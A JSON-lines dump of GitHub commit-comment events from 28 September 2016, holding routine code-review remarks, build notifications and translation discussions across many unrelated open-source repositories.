{"id":"4632277772","type":"CommitCommentEvent","actor":{"login":"StrikeForceZero"},"repo":{"name":"airbnb/enzyme"},"payload":{"comment":{"id":19211594,"position":null,"line":null,"path":null,"commit_id":"1d0fc67459955564d0455b56a9cc228aca01df2d","created_at":"2016-09-28T17:46:34Z","updated_at":"2016-09-28T17:46:34Z","body":"@ljharb @roderickhsiao  actually I think it still pulls version `0.20.x` with the caret. so a new package could be really helpful right now as I can't figure out a reasonable way around it for the time being.\r\n\r\n[from the semver npm docs](https://docs.npmjs.com/misc/semver#caret-ranges-123-025-004)\r\n- ^1.2.3 := >=1.2.3 <2.0.0\r\n- __^0.2.3 := >=0.2.3 <0.3.0__ this is where cheerio lands. \r\n\r\npulls in cheerio 0.20 with issue https://github.com/cheeriojs/cheerio/issues/891"}},"created_at":"2016-09-28T17:46:34Z"}
{"id":"4632277996","type":"CommitCommentEvent","actor":{"login":"brunosmartin"},"repo":{"name":"institutotim/timtec"},"payload":{"comment":{"id":19211595,"position":null,"line":null,"path":null,"commit_id":"c2d86c7574042c69c4c932e2d78c6552607c35e8","created_at":"2016-09-28T17:46:36Z","updated_at":"2016-09-28T17:46:36Z","body":"Acho q tem testar bem, pra ver se não tem esse id #activation-wrapper em outro lugar. Se não tiver, é ok.\r\nTem que verificar também no tem timtec..."}},"created_at":"2016-09-28T17:46:36Z"}
{"id":"4632278015","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19211597,"position":null,"line":null,"path":null,"commit_id":"7a4c357c9c3df8314e815a0ac5f4674225f2d7aa","created_at":"2016-09-28T17:46:37Z","updated_at":"2016-09-28T17:46:37Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=125)"}},"created_at":"2016-09-28T17:46:37Z"}
{"id":"4632278431","type":"CommitCommentEvent","actor":{"login":"WaltLivingston"},"repo":{"name":"ub-idia640-2016/course-materials"},"payload":{"comment":{"id":19211599,"position":null,"line":null,"path":null,"commit_id":"b5de7e7081489f9d97a9a5ffda6931853013e571","created_at":"2016-09-28T17:46:41Z","updated_at":"2016-09-28T17:46:41Z","body":"I've got my observations and commentary on the chapters, but I'm kind of at a loss how to provide examples of the concepts.  How can I provide an example of gestalting, or of one's brain literally trying to make sense of everything that comes in through the optic nerve, by one strategy/technique or anoither.  Those are pretty covert processes and happen inside the user.   What sort of website might illustrate such fleeting, internal phenomena?"}},"created_at":"2016-09-28T17:46:41Z"}
{"id":"4632282025","type":"CommitCommentEvent","actor":{"login":"KayAina"},"repo":{"name":"MikeMeyers2504/Information-security"},"payload":{"comment":{"id":19211614,"position":null,"line":null,"path":null,"commit_id":"fdd8f067ef648e5fcd3947fc6c2864c4f18d6638","created_at":"2016-09-28T17:47:18Z","updated_at":"2016-09-28T17:47:18Z","body":"Vindt ik leuk"}},"created_at":"2016-09-28T17:47:18Z"}
{"id":"4632282420","type":"CommitCommentEvent","actor":{"login":"dpsupermarket"},"repo":{"name":"dpsupermarket/Cutushaa"},"payload":{"comment":{"id":19211615,"position":1,"line":1,"path":"README.md","commit_id":"0e87f06f99321d0bba31bd3bc1cebfce8055d6b1","created_at":"2016-09-28T17:47:23Z","updated_at":"2016-09-28T17:47:23Z","body":"I Love you"}},"created_at":"2016-09-28T17:47:23Z"}
{"id":"4632284421","type":"CommitCommentEvent","actor":{"login":"bornhaeusser"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19211630,"position":null,"line":null,"path":null,"commit_id":"dd1e57a7b7bfb61d1354b33735135b2fe9f3d807","created_at":"2016-09-28T17:47:45Z","updated_at":"2016-09-28T17:47:45Z","body":"Speichern funktioniert leider nicht...."}},"created_at":"2016-09-28T17:47:45Z"}
{"id":"4632285402","type":"CommitCommentEvent","actor":{"login":"raoc999"},"repo":{"name":"ingbrzy/MA-XML-8.0-TURKISH"},"payload":{"comment":{"id":19211634,"position":null,"line":null,"path":null,"commit_id":"9d2da976c89842f014211ae64b792c7dc88f9614","created_at":"2016-09-28T17:47:55Z","updated_at":"2016-09-28T17:47:55Z","body":"Also why do not you let the framework-res.apk file. Is there a problem? Too\nmany lines to include. File has missing lines. Some places are different\ntranslation.\n\nrecep.ali.orhan.cakmak\n\n2016-09-28 20:43 GMT+03:00 recep.ali.orhan ÇAKMAK <raocakmak@gmail.com>:\n\n> Last time you are changed MiuiSystemUI file. But we are using \"%100\"\n> format not using \"100%\" style. Exam: %10 pil kaldı!\n>\n> recep.ali.orhan.cakmak\n>\n> 2016-09-28 12:46 GMT+03:00 ingbrzy <notifications@github.com>:\n>\n>> you just waste your time by translating these useless apks..\n>>\n>> —\n>> You are receiving this because you are subscribed to this thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/ingbrzy/MA-XML-8.0-TURKISH/commit/9d2da976c89842f014211ae64b792c7dc88f9614#commitcomment-19204845>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AP5Puzrl2aQxFVqGshbmqy1pkKJCa9yEks5qujdrgaJpZM4KInj0>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-28T17:47:55Z"}
{"id":"4632287821","type":"CommitCommentEvent","actor":{"login":"NathanWolf"},"repo":{"name":"elBukkit/MagicPlugin"},"payload":{"comment":{"id":19211646,"position":null,"line":null,"path":null,"commit_id":"5e4e9dd0e3781bddc24c9970b210d2c1fc3ad116","created_at":"2016-09-28T17:48:23Z","updated_at":"2016-09-28T17:48:23Z","body":"Hm yeah that might be a good idea- though you should be able to work around this by adjusting the \"melee\" material set, just make it empty I guess. Then it won't treat sword-wands as melee weapons"}},"created_at":"2016-09-28T17:48:23Z"}
{"id":"4632288592","type":"CommitCommentEvent","actor":{"login":"skyguy126"},"repo":{"name":"skyguy126/GCI"},"payload":{"comment":{"id":19211647,"position":null,"line":null,"path":null,"commit_id":"62eebea1d283cfb490a576a84781b3b2948bb129","created_at":"2016-09-28T17:48:31Z","updated_at":"2016-09-28T17:48:31Z","body":"-rep stop committing libraries"}},"created_at":"2016-09-28T17:48:31Z"}
{"id":"4632292755","type":"CommitCommentEvent","actor":{"login":"NathanWolf"},"repo":{"name":"elBukkit/MagicPlugin"},"payload":{"comment":{"id":19211657,"position":null,"line":null,"path":null,"commit_id":"5e4e9dd0e3781bddc24c9970b210d2c1fc3ad116","created_at":"2016-09-28T17:49:15Z","updated_at":"2016-09-28T17:49:15Z","body":"Let me know if that works for you, or if you'd like to add something else- and also if we ought to revert this commit."}},"created_at":"2016-09-28T17:49:15Z"}
{"id":"4632296128","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19211671,"position":null,"line":null,"path":null,"commit_id":"91bf406d6a25ddace386b066764b5a6093fb5743","created_at":"2016-09-28T17:49:52Z","updated_at":"2016-09-28T17:49:52Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 279](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1256&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Compilation error: Xbim.Geometry.Engine.Interop\\Xbim.Geometry.Engine.Interop.csproj (new) Build time: 00:26:37"}},"created_at":"2016-09-28T17:49:52Z"}
{"id":"4632296470","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19211675,"position":null,"line":null,"path":null,"commit_id":"65aca75b340419adbb7e95b614fa42990cb92b2c","created_at":"2016-09-28T17:49:56Z","updated_at":"2016-09-28T17:49:56Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 438](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1257&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2016-09-28T17:49:56Z"}
{"id":"4632302622","type":"CommitCommentEvent","actor":{"login":"ccgmatt76"},"repo":{"name":"A3Armory/A3A_A3Wasteland.Altis"},"payload":{"comment":{"id":19211680,"position":null,"line":null,"path":null,"commit_id":"b29ba363072a30232a83b59ac9ba6eb5990f632d","created_at":"2016-09-28T17:51:02Z","updated_at":"2016-09-28T17:51:02Z","body":"You have missed a step out on this chap \r\n\r\ndescription.ext\r\n#include \"addons\\UniformPainter\\dialog\\UniformPainter_mainMenu.hpp\""}},"created_at":"2016-09-28T17:51:02Z"}
{"id":"4632307459","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/vault-updater"},"payload":{"comment":{"id":19211690,"position":null,"line":null,"path":null,"commit_id":"ae4d2464a607bccc8c6d092e782ec8ed2ac5f262","created_at":"2016-09-28T17:51:51Z","updated_at":"2016-09-28T17:51:51Z","body":"++"}},"created_at":"2016-09-28T17:51:51Z"}
{"id":"4632308067","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19211691,"position":null,"line":null,"path":null,"commit_id":"65aca75b340419adbb7e95b614fa42990cb92b2c","created_at":"2016-09-28T17:51:57Z","updated_at":"2016-09-28T17:51:57Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 438](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1257&buildTypeId=XbimEssentials_XbimEssentials) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:32"}},"created_at":"2016-09-28T17:51:57Z"}
{"id":"4632309053","type":"CommitCommentEvent","actor":{"login":"MerMalibu"},"repo":{"name":"jquery/jquery"},"payload":{"comment":{"id":19211694,"position":null,"line":null,"path":null,"commit_id":"66e1b6b8d49812239b5712d65922ff94c60f7b02","created_at":"2016-09-28T17:52:05Z","updated_at":"2016-09-28T17:52:05Z","body":"You should include a copyright date. See the US Copyright Office circular: http://www.copyright.gov/circs/circ03.pdf"}},"created_at":"2016-09-28T17:52:05Z"}
{"id":"4632309849","type":"CommitCommentEvent","actor":{"login":"jwhoneycutt"},"repo":{"name":"jwhoneycutt/hello-world"},"payload":{"comment":{"id":19211698,"position":null,"line":null,"path":null,"commit_id":"1f6f84ce101c682add06b3b4e7d69905635097ae","created_at":"2016-09-28T17:52:16Z","updated_at":"2016-09-28T17:52:16Z","body":"This is where I can make a change to the text!"}},"created_at":"2016-09-28T17:52:16Z"}
{"id":"4632309890","type":"CommitCommentEvent","actor":{"login":"epkann"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19211699,"position":79,"line":79,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-28T17:52:17Z","updated_at":"2016-09-28T17:52:17Z","body":"Why is this return superfluous?"}},"created_at":"2016-09-28T17:52:17Z"}
{"id":"4632311484","type":"CommitCommentEvent","actor":{"login":"jwhoneycutt"},"repo":{"name":"jwhoneycutt/hello-world"},"payload":{"comment":{"id":19211702,"position":null,"line":null,"path":null,"commit_id":"1f6f84ce101c682add06b3b4e7d69905635097ae","created_at":"2016-09-28T17:52:32Z","updated_at":"2016-09-28T17:52:32Z","body":"self evident comment"}},"created_at":"2016-09-28T17:52:32Z"}
{"id":"4632311559","type":"CommitCommentEvent","actor":{"login":"aforren1"},"repo":{"name":"BLAM-Lab-Projects/finger-6"},"payload":{"comment":{"id":19211703,"position":18,"line":18,"path":"data/analysis/analyzeForcedRTdata_all.m","commit_id":"0bbd4aa24bd1b15958ebdcc381d0f1f4feecac8b","created_at":"2016-09-28T17:52:33Z","updated_at":"2016-09-28T17:52:33Z","body":"You could also just do `load(F)` which avoids `eval()`"}},"created_at":"2016-09-28T17:52:33Z"}
{"id":"4632314472","type":"CommitCommentEvent","actor":{"login":"Morphan1"},"repo":{"name":"mcmonkey4eva/Denizen"},"payload":{"comment":{"id":19211712,"position":null,"line":null,"path":null,"commit_id":"13557fc16ed847bdc69c03382ce74e8ca93e83c5","created_at":"2016-09-28T17:53:02Z","updated_at":"2016-09-28T17:53:02Z","body":"...But this property isn't even registered on 1.8? Its API didn't even exist back then, we need something else to handle the way old system "}},"created_at":"2016-09-28T17:53:02Z"}
{"id":"4632316021","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":19211716,"position":null,"line":null,"path":null,"commit_id":"9fe93205556d0144217d5cc1ba3df04c80f0a694","created_at":"2016-09-28T17:53:19Z","updated_at":"2016-09-28T17:53:19Z","body":"Right, the case of more than one DM installed needs testing.\r\nIf only one can be enabled by systemd, then I think it will be the first in the list."}},"created_at":"2016-09-28T17:53:19Z"}
{"id":"4632316418","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19211717,"position":79,"line":79,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-28T17:53:24Z","updated_at":"2016-09-28T17:53:24Z","body":"`Insert` returns no values and this `return` is already at the end of the function."}},"created_at":"2016-09-28T17:53:24Z"}
{"id":"4632317549","type":"CommitCommentEvent","actor":{"login":"lemmy04"},"repo":{"name":"CyanogenMod/android_device_samsung_manta"},"payload":{"comment":{"id":19211719,"position":null,"line":null,"path":null,"commit_id":"76df05906ef7e52cb13a6359254fe27681060ef9","created_at":"2016-09-28T17:53:35Z","updated_at":"2016-09-28T17:53:35Z","body":"ah... ok that makes sense, seeing how i would usually have to get rid of some things on my N10 from /system to be able to install supersu and such."}},"created_at":"2016-09-28T17:53:35Z"}
{"id":"4632318891","type":"CommitCommentEvent","actor":{"login":"Gigatek1"},"repo":{"name":"A3Armory/A3A_A3Wasteland.Altis"},"payload":{"comment":{"id":19211721,"position":null,"line":null,"path":null,"commit_id":"b29ba363072a30232a83b59ac9ba6eb5990f632d","created_at":"2016-09-28T17:53:49Z","updated_at":"2016-09-28T17:53:49Z","body":"Oops. Did a revert of that file after trying to get the animations for rappelling to work."}},"created_at":"2016-09-28T17:53:49Z"}
{"id":"4632321672","type":"CommitCommentEvent","actor":{"login":"aforren1"},"repo":{"name":"BLAM-Lab-Projects/finger-6"},"payload":{"comment":{"id":19211728,"position":55,"line":55,"path":"data/analysis/analyzeForcedRTdata_all.m","commit_id":"0bbd4aa24bd1b15958ebdcc381d0f1f4feecac8b","created_at":"2016-09-28T17:54:17Z","updated_at":"2016-09-28T17:54:17Z","body":"Might want to rename? Might run into `error()` function"}},"created_at":"2016-09-28T17:54:17Z"}
{"id":"4632325567","type":"CommitCommentEvent","actor":{"login":"usaAmch"},"repo":{"name":"usaAmch/ExcelExtensions"},"payload":{"comment":{"id":19211732,"position":39,"line":39,"path":"KJS.ExcelExtensions/FindProperties.cs","commit_id":"50bdcf072666fc850bb653571188b96753903701","created_at":"2016-09-28T17:54:55Z","updated_at":"2016-09-28T17:54:55Z","body":"Remove this lines, they were needed before for a test but not anymore."}},"created_at":"2016-09-28T17:54:55Z"}
{"id":"4632328737","type":"CommitCommentEvent","actor":{"login":"ccgmatt76"},"repo":{"name":"A3Armory/A3A_A3Wasteland.Altis"},"payload":{"comment":{"id":19211739,"position":null,"line":null,"path":null,"commit_id":"b29ba363072a30232a83b59ac9ba6eb5990f632d","created_at":"2016-09-28T17:55:25Z","updated_at":"2016-09-28T17:55:25Z","body":"ha no worries, vehicle painter needs adding as well chap\r\n"}},"created_at":"2016-09-28T17:55:25Z"}
{"id":"4632328995","type":"CommitCommentEvent","actor":{"login":"Mook-as"},"repo":{"name":"hpcloud/gorouter"},"payload":{"comment":{"id":19211742,"position":14,"line":137,"path":"registry/registry_test.go","commit_id":"91475f21eaf8b94a92b0842f078c9d1cba847ac4","created_at":"2016-09-28T17:55:28Z","updated_at":"2016-09-28T17:55:28Z","body":"Wouldn't the old test have checked that the context path is empty?"}},"created_at":"2016-09-28T17:55:28Z"}
{"id":"4632332206","type":"CommitCommentEvent","actor":{"login":"Mook-as"},"repo":{"name":"hpcloud/gorouter"},"payload":{"comment":{"id":19211745,"position":15,"line":150,"path":"registry/registry_test.go","commit_id":"392327199ec132b58d2890dfd178e45c430ab05d","created_at":"2016-09-28T17:56:02Z","updated_at":"2016-09-28T17:56:02Z","body":"Add a thing to check that when `r.Lookup(<lower case>)` we get nothing?"}},"created_at":"2016-09-28T17:56:02Z"}
{"id":"4632337212","type":"CommitCommentEvent","actor":{"login":"raoc999"},"repo":{"name":"ingbrzy/MA-XML-8.0-TURKISH"},"payload":{"comment":{"id":19211759,"position":null,"line":null,"path":null,"commit_id":"9d2da976c89842f014211ae64b792c7dc88f9614","created_at":"2016-09-28T17:56:51Z","updated_at":"2016-09-28T17:56:51Z","body":"All models of the file should be merged. The redundant line should be\ndeleted. Each statement should be written once. We turn again to the same\nphrase in each file. For example: Cancel, Next, Previous, OK, Next, Next,\nContinue? etc. The language file is always growing.\n\nSee you, boss ...\n\nrecep.ali.orhan.cakmak\n\n2016-09-28 20:47 GMT+03:00 recep.ali.orhan ÇAKMAK <raocakmak@gmail.com>:\n\n> Also why do not you let the framework-res.apk file. Is there a problem?\n> Too many lines to include. File has missing lines. Some places are\n> different translation.\n>\n> recep.ali.orhan.cakmak\n>\n> 2016-09-28 20:43 GMT+03:00 recep.ali.orhan ÇAKMAK <raocakmak@gmail.com>:\n>\n>> Last time you are changed MiuiSystemUI file. But we are using \"%100\"\n>> format not using \"100%\" style. Exam: %10 pil kaldı!\n>>\n>> recep.ali.orhan.cakmak\n>>\n>> 2016-09-28 12:46 GMT+03:00 ingbrzy <notifications@github.com>:\n>>\n>>> you just waste your time by translating these useless apks..\n>>>\n>>> —\n>>> You are receiving this because you are subscribed to this thread.\n>>> Reply to this email directly, view it on GitHub\n>>> <https://github.com/ingbrzy/MA-XML-8.0-TURKISH/commit/9d2da976c89842f014211ae64b792c7dc88f9614#commitcomment-19204845>,\n>>> or mute the thread\n>>> <https://github.com/notifications/unsubscribe-auth/AP5Puzrl2aQxFVqGshbmqy1pkKJCa9yEks5qujdrgaJpZM4KInj0>\n>>> .\n>>>\n>>\n>>\n>\n"}},"created_at":"2016-09-28T17:56:51Z"}
{"id":"4632340472","type":"CommitCommentEvent","actor":{"login":"Petrov-Stormwing"},"repo":{"name":"XelSelenius/Programming-Fundamentals"},"payload":{"comment":{"id":19211767,"position":null,"line":null,"path":null,"commit_id":"05295183d0f75193639da9cb288d3020f3298722","created_at":"2016-09-28T17:57:25Z","updated_at":"2016-09-28T17:57:25Z","body":"Static entry will be correct, according to Judge.\r\nOtherwise it looks Correct."}},"created_at":"2016-09-28T17:57:25Z"}
{"id":"4632344733","type":"CommitCommentEvent","actor":{"login":"lrsousa"},"repo":{"name":"lrsousa/ProjetoResiduos"},"payload":{"comment":{"id":19211779,"position":null,"line":null,"path":null,"commit_id":"90608e2b681331168c2c542723936458ef3b3aca","created_at":"2016-09-28T17:58:10Z","updated_at":"2016-09-28T17:58:10Z","body":"Muito melhor!"}},"created_at":"2016-09-28T17:58:10Z"}
{"id":"4632352471","type":"CommitCommentEvent","actor":{"login":"Minimata"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19211800,"position":32,"line":24,"path":"planet/js/Controller.js","commit_id":"e68e45a25597b1d43d3cafde3ebfb5b637857c99","created_at":"2016-09-28T17:59:30Z","updated_at":"2016-09-28T17:59:30Z","body":"@greut this is where the sensitive code i wrote for the constructor is being called for testing."}},"created_at":"2016-09-28T17:59:30Z"}
{"id":"4632353905","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19211804,"position":135,"line":135,"path":"it/mozorg/newsletters.lang","commit_id":"3a302258f6dd8bfe17692d3a02d30f6c0369b506","created_at":"2016-09-28T17:59:46Z","updated_at":"2016-09-28T17:59:46Z","body":"Quelle mail mi arrivano all'indirizzo mozillaitalia che è ancora pieno \ndi spam, faccio un po' fatica a seguirlo.\nComunque ora vado a leggermi il bug.\n\n\n"}},"created_at":"2016-09-28T17:59:46Z"}
{"id":"4632359461","type":"CommitCommentEvent","actor":{"login":"stsp"},"repo":{"name":"stsp/dosemu2"},"payload":{"comment":{"id":19211810,"position":null,"line":null,"path":null,"commit_id":"7374a6e0978ee4d35f764401719a027034c0173d","created_at":"2016-09-28T18:00:41Z","updated_at":"2016-09-28T18:00:41Z","body":"For such driver to work, we need to also\r\nemulate the tablet, because mouse itself\r\ndoesn't support absolute coordinates."}},"created_at":"2016-09-28T18:00:41Z"}
{"id":"4632359566","type":"CommitCommentEvent","actor":{"login":"epkann"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19211811,"position":79,"line":79,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-28T18:00:41Z","updated_at":"2016-09-28T18:00:41Z","body":"Oh! So in general, if a function returns no values it will automatically\nreturn control once it gets to the end of the function code?\n\nOn Wed, Sep 28, 2016 at 12:53 PM, Joe Tsai <notifications@github.com> wrote:\n\n> Insert returns no values and this return is already at the end of the\n> function.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/epkann/Data-Structures/commit/e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca#commitcomment-19211717>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASib155FJYtpdAAETYvaTuaxue1OWVeJks5quqmUgaJpZM4KH77r>\n> .\n>\n\n\n\n-- \nwww.esthertsai.com\n"}},"created_at":"2016-09-28T18:00:41Z"}
{"id":"4632361486","type":"CommitCommentEvent","actor":{"login":"killme"},"repo":{"name":"elBukkit/MagicPlugin"},"payload":{"comment":{"id":19211815,"position":null,"line":null,"path":null,"commit_id":"5e4e9dd0e3781bddc24c9970b210d2c1fc3ad116","created_at":"2016-09-28T18:01:01Z","updated_at":"2016-09-28T18:01:01Z","body":"Already reverted and blanked that :)\r\nShould I go ahead and replace this with a more fine grained control anyways?"}},"created_at":"2016-09-28T18:01:01Z"}
{"id":"4632361879","type":"CommitCommentEvent","actor":{"login":"rickross"},"repo":{"name":"Roboforce/Self-Balancing-Scooter"},"payload":{"comment":{"id":19211817,"position":null,"line":null,"path":null,"commit_id":"ee6292dec4c6b7471d23c7fb0937e60e81c58f16","created_at":"2016-09-28T18:01:06Z","updated_at":"2016-09-28T18:01:06Z","body":"# Writing a Page with the Github Editor!\r\n\r\nWe have three primary colors:\r\n\r\n1. Red\r\n1. Green\r\n1. Blue\r\n\r\n## History of Marshmallows\r\n\r\nThe **first** and _best_ example of marshmallow history comes to us from Lord Jet-Puff!\r\n\r\n***\r\n\r\nIt is *possible* there is a more **pythonic** way, but it would be difficult to reveal it.\r\n\r\n1. Python\r\n1. Python\r\n1. Python\r\n\r\n***\r\n![glass_of_water_350](https://cloud.githubusercontent.com/assets/219891/18925950/e38df0b6-8583-11e6-9397-2a9e8831b5d0.jpg)\r\n"}},"created_at":"2016-09-28T18:01:06Z"}
{"id":"4632362981","type":"CommitCommentEvent","actor":{"login":"Minimata"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19211820,"position":43,"line":43,"path":"planet/js/SceneObjects/Drawable.js","commit_id":"e68e45a25597b1d43d3cafde3ebfb5b637857c99","created_at":"2016-09-28T18:01:17Z","updated_at":"2016-09-28T18:01:17Z","body":"@greut And here is the constructor code, with a bit of comments to help. Please criticize it as much as you want / can =)"}},"created_at":"2016-09-28T18:01:17Z"}
{"id":"4632363891","type":"CommitCommentEvent","actor":{"login":"ingbrzy"},"repo":{"name":"ingbrzy/MA-XML-8.0-TURKISH"},"payload":{"comment":{"id":19211822,"position":null,"line":null,"path":null,"commit_id":"9d2da976c89842f014211ae64b792c7dc88f9614","created_at":"2016-09-28T18:01:27Z","updated_at":"2016-09-28T18:01:27Z","body":"because you add there a lot of not translatable strings which breaks all devices and makes an issues like with yours camera!\r\nnow there is stock AOSP translation which is correct..\r\n\r\nyou also added a lot of useless apks which doesn't need to be translated..."}},"created_at":"2016-09-28T18:01:27Z"}
{"id":"4632364939","type":"CommitCommentEvent","actor":{"login":"Gigatek1"},"repo":{"name":"A3Armory/A3A_A3Wasteland.Altis"},"payload":{"comment":{"id":19211825,"position":null,"line":null,"path":null,"commit_id":"a7f74f71676a5eea58d59b0785eebd0679fc2f99","created_at":"2016-09-28T18:01:37Z","updated_at":"2016-09-28T18:01:37Z","body":"This needs testing. Gotta run now, wont be back for a few hours, but if any one can test this please do."}},"created_at":"2016-09-28T18:01:37Z"}
{"id":"4632372598","type":"CommitCommentEvent","actor":{"login":"NathanWolf"},"repo":{"name":"elBukkit/MagicPlugin"},"payload":{"comment":{"id":19211846,"position":null,"line":null,"path":null,"commit_id":"5e4e9dd0e3781bddc24c9970b210d2c1fc3ad116","created_at":"2016-09-28T18:02:57Z","updated_at":"2016-09-28T18:02:57Z","body":"That's up to you I suppose! I think you can make AMC work fine by just blanking the melee list, so I think for your purposes you don't need to spend the time.\r\n\r\nI guess the only edge case would be if you want some sword-wands to cast on hit, but others to not (it feels weird if it's supposed to be an actual sword that can also cast spells), but so far no one's wanted that. A \"melee\" tag or something in the wand data would probably work, but I'd say don't worry about it unless you really want it yourself."}},"created_at":"2016-09-28T18:02:57Z"}
{"id":"4632375433","type":"CommitCommentEvent","actor":{"login":"faahbih"},"repo":{"name":"faahbih/ExerciciosServlet"},"payload":{"comment":{"id":19211854,"position":null,"line":null,"path":null,"commit_id":"a325b83e026369c0de4e8c89484f7158a70952bb","created_at":"2016-09-28T18:03:26Z","updated_at":"2016-09-28T18:03:26Z","body":"Como eu não percebi isso? rsr"}},"created_at":"2016-09-28T18:03:26Z"}
{"id":"4632378033","type":"CommitCommentEvent","actor":{"login":"calh"},"repo":{"name":"etsy/411"},"payload":{"comment":{"id":19211856,"position":6,"line":60,"path":"phplib/Site.php","commit_id":"785c3938860f8f879d248705427b3e48d5397e69","created_at":"2016-09-28T18:03:52Z","updated_at":"2016-09-28T18:03:52Z","body":"Not to sound too nit-picky, but how about `FOURONEONEHOST` as an alternative?"}},"created_at":"2016-09-28T18:03:52Z"}
{"id":"4632378357","type":"CommitCommentEvent","actor":{"login":"faahbih"},"repo":{"name":"faahbih/ExerciciosServlet"},"payload":{"comment":{"id":19211858,"position":2,"line":1,"path":"HelloServlet.java","commit_id":"a325b83e026369c0de4e8c89484f7158a70952bb","created_at":"2016-09-28T18:03:56Z","updated_at":"2016-09-28T18:03:56Z","body":"como eu não percebi isso? hauhauh"}},"created_at":"2016-09-28T18:03:56Z"}
{"id":"4632385812","type":"CommitCommentEvent","actor":{"login":"mlizarraga90"},"repo":{"name":"fjenett/xlsreader-library-processing"},"payload":{"comment":{"id":19211871,"position":null,"line":null,"path":null,"commit_id":"3d833135e9fa31611614d5ea875eaeca4b681f89","created_at":"2016-09-28T18:05:14Z","updated_at":"2016-09-28T18:05:14Z","body":"cx"}},"created_at":"2016-09-28T18:05:14Z"}
{"id":"4632391230","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19211877,"position":79,"line":79,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-28T18:06:10Z","updated_at":"2016-09-28T18:06:10Z","body":"See https://play.golang.org/p/4JRAY87of_"}},"created_at":"2016-09-28T18:06:10Z"}
{"id":"4632395647","type":"CommitCommentEvent","actor":{"login":"raoc999"},"repo":{"name":"ingbrzy/MA-XML-8.0-TURKISH"},"payload":{"comment":{"id":19211890,"position":null,"line":null,"path":null,"commit_id":"9d2da976c89842f014211ae64b792c7dc88f9614","created_at":"2016-09-28T18:06:57Z","updated_at":"2016-09-28T18:06:57Z","body":"Okay, I got it. I will deal with unnecessary applications. I will update\nquickly master files.\n\nrecep.ali.orhan.cakmak\n\n2016-09-28 21:01 GMT+03:00 ingbrzy <notifications@github.com>:\n\n> because you add there a lot of not translatable strings which breaks all\n> devices and makes an issues like with yours camera!\n> now there is stock AOSP translation which is correct..\n>\n> you also added a lot of useless apks which doesn't need to be translated...\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ingbrzy/MA-XML-8.0-TURKISH/commit/9d2da976c89842f014211ae64b792c7dc88f9614#commitcomment-19211822>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AP5Pu6qvZRLnle1a7IZnZLnn6Op45MWiks5quqt3gaJpZM4KInj0>\n> .\n>\n"}},"created_at":"2016-09-28T18:06:57Z"}
{"id":"4632398806","type":"CommitCommentEvent","actor":{"login":"refractionpcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19211893,"position":null,"line":null,"path":null,"commit_id":"fd58ee62890b8c7e468c92a16aa51728908da49d","created_at":"2016-09-28T18:07:29Z","updated_at":"2016-09-28T18:07:29Z","body":"tbh i want to see if it should really be using SIF2 which is connected to that channel, but need to work out how it would interact.\r\n"}},"created_at":"2016-09-28T18:07:29Z"}
{"id":"4632399560","type":"CommitCommentEvent","actor":{"login":"andreas-kupries"},"repo":{"name":"hpcloud/gorouter"},"payload":{"comment":{"id":19211896,"position":14,"line":137,"path":"registry/registry_test.go","commit_id":"91475f21eaf8b94a92b0842f078c9d1cba847ac4","created_at":"2016-09-28T18:07:37Z","updated_at":"2016-09-28T18:07:37Z","body":"AFAIK, no.\r\nThe existing `Expect(p).ToNot(BeNil())` tests that we get a pool `p` for the key.\r\nIt tested nothing about the context path stored within `p`."}},"created_at":"2016-09-28T18:07:37Z"}
